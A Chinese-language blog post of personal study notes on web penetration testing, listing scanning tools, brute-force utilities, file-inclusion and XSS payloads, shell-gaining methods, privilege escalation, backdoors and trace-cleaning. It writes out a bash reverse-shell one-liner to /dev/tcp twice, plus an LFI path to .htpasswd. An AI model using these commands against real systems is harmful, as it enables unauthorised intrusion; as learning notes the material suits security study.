对于最近10来天web渗透学习小结

正文:

一些知识点的汇总:

tomcat 弱密码爆破
shodan 强大的浏览器功能
fosa.so  强大的搜索功能
docker 镜像问题  拉取镜像的建立,很常用的功能
jsp的cmd代码
jboss的序列化和反序列化(未学)
dedecms
爆破后台路径

一.

1.扫目录

dirb(一层一层的扫描),御剑扫描,dirbuster,nmap也能扫一些http目录,webscan(kali自带)。
最好使用可以控制请求延迟的工具进行扫描,现在很多网站,扫描过于频繁直接就封了ip。

2.扫端口:

masscan快速扫描端口
nmap 再详细扫描

二.常见的漏洞(仅仅我这几天遇到的小结)

1.注入(sql,cookie):

其中sql注入是很少见的了,存在极少数的漏网之鱼,前不久的安全峰会,阿里云刚宣布旗下没有一台sql注入的服务器。
其中cookie注入是本人是遇见了很少。只在ctf题中遇见过一次。
还有一些注入型的漏洞,由于知识面的缘故,暂时不提。

2.xss:

http://ip/?title=</title><script>localtion.href=”https://www.baidu.com/”;<script>
一般是发表评论,或者留言的地方存在,不会利用

3:smaba

nmap有专门的smaba扫描脚本

4.ssh(很少,一般是爆破) ssh -p 23

一般是爆破,但是证书登陆的话,每次输入有限制(3次),且要证书,
密码爆破有三款软件
john hydra medusa
用john来爆破htpasswd
john htpasswd -show

上传:

截断是php5.4之前
解析是iis6和apache

文件包含:

page=../restricted/.htpasswd%00
远程文件包含,利用攻击者自己的网址进行exp脚本的包含
本地文件包含,获取服务器文件的内容

命令执行:

查看一些敏感信息,或者写入等等方法getshell,或者获取用户权限(bash反弹命令)(开启nc监听
echo “bash -i >& /dev/tcp/ip/5555 0>&1” | bash)
版本漏洞(上网搜索,有些特定的cms有特定的漏洞,直接可以拿下),webug基本是这种

三.漏洞的利用

1.

登陆,一般是后台登陆
shell,常规是备份改名称后缀拿shell,上传拿shell,编辑拿shell,写入拿shell,网址标题拿shell

2.

wordpress拿shell
写小马 写大马 php反弹shell zip马插件上传
写在404 也面
wpscan -u “” -user –wordlist “/usr/l”
3.普通用户,执行命令

1.

find / -uesr “” 2 >/dev/null,2>/dev/null
过滤没有权限的文件
strings 打印可打印的字符串

2.

开启nc监听
echo “bash -i >& /dev/tcp/5555 0>&1” | bash

3.

echo 文件,赋予执行权限,bash到权限

4.

python 反弹shell

四.提升自己的权限,留下后门,清理痕迹

exp提权(最常见),软件漏洞提权

五.对于遇到问题的总结和记录

记录每一次的方法和知识点,在于熟练的运用
 
2018.7.19
 

发表评论

电子邮件地址不会被公开。 必填项已用*标注